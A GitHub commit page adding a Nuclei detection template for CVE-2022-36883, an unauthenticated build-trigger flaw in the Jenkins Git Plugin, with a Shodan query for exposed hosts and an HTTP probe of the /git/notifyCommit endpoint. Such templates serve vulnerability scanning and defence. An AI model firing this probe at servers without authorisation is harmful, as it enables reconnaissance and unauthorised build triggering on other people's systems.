Merge pull request #5052 from projectdiscovery/CVE-2022-36883

Create CVE-2022-36883.yaml
patch-1
Prince Chaddha 2022-08-09 02:50:31 -07:00 committed by GitHub
commit 74511edf9b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2022-36883
info:
name: Git Plugin up to 4.11.3 on Jenkins Build Authorization
severity: high
author: c-sh0
description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
reference:
- https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
- https://nvd.nist.gov/vuln/detail/CVE-2022-36883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2022-36883
cwe-id: CWE-862
metadata:
verified: true
shodan-query: "X-Jenkins"
tags: cve,cve2022,jenkins,plugin,git
requests:
- method: GET
path:
- "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "repository:"
- "SCM API plugin"
condition: and
- type: status
status:
- 200